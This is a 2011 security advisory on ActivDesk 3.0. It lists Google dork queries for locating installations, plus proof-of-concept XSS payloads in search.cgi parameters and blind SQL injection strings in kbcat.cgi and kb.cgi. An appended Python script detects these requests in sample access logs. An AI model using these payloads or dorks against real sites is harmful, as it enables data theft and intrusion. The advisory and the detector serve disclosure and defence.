ActivDesk 3.0 multiple security vulnerabilities

# Date: 2011-06-24
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-24-ActivDesk-3.0-multiple-security-vulnerabilities/

# Software: ActivDesk
# Version: <= 3.0
# Homepage: http://www.webhelpdesk-software.com/
# Google Dorks:
#   inurl:kbcat.cgi ext:cgi
#   "Help Desk Powered By ActivDesk"

# Vendor: FocalMedia
# Homepage: http://www.focalmedia.net/
# Notified: 2011-06-24 - Ticket# 67120010491

# Cross-Site Scripting (XSS):
http://localhost/[PATH]/search.cgi?keywords0=<script>alert(0)</script>
http://localhost/[PATH]/search.cgi?keywords1=<script>alert(1)</script>
http://localhost/[PATH]/search.cgi?keywords2=<script>alert(2)</script>
http://localhost/[PATH]/search.cgi?keywords3=<script>alert(3)</script>

# Blind SQL Injection:
http://localhost/[PATH]/kbcat.cgi?cid=' or substring(@@version,1,1)=5 and ''='
http://localhost/[PATH]/kb.cgi?kid=' or substring(@@version,1,1)=5 and ''='
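
A log check for the request patterns listed above, as an added example that is not part of the original advisory: it scans combined-format access log lines for markup in the search.cgi keywordsN parameters and for non-token values in kbcat.cgi cid and kb.cgi kid. The log lines and the /helpdesk/ path are constructed samples, and the rule that legitimate ids are simple alphanumeric tokens is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Script -> parameter pairs named in the advisory's SQL injection section.
SQLI_PARAMS = {"kbcat.cgi": "cid", "kb.cgi": "kid"}
# Assumption: legitimate category/article ids are simple tokens.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]*\Z")
# Angle brackets have no place in a plain-text search keyword.
MARKUP = re.compile(r"[<>]")

def classify(log_line):
    """Return (kind, script, param, decoded_value) findings for one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    findings = []
    # parse_qsl percent-decodes names and values, so encoded input is checked
    # in the same form the CGI script would see it.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if script == "search.cgi" and re.fullmatch(r"keywords\d+", name):
            if MARKUP.search(value):
                findings.append(("xss", script, name, value))
        elif SQLI_PARAMS.get(script) == name and not SAFE_ID.match(value):
            findings.append(("sqli", script, name, value))
    return findings

# Constructed sample log lines (documentation IP range, hypothetical path).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jun/2011:10:00:01 +0000] '
    '"GET /helpdesk/search.cgi?keywords0=printer+driver HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/Jun/2011:10:00:05 +0000] '
    '"GET /helpdesk/search.cgi?keywords1=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4301',
    '192.0.2.11 - - [24/Jun/2011:10:00:09 +0000] '
    '"GET /helpdesk/kbcat.cgi?cid=%27%20or%20substring(@@version,1,1)=5%20and%20%27%27=%27 HTTP/1.1" 200 2210',
    '192.0.2.12 - - [24/Jun/2011:10:00:12 +0000] '
    '"GET /helpdesk/kb.cgi?kid=42 HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for finding in classify(line):
            print(finding)
```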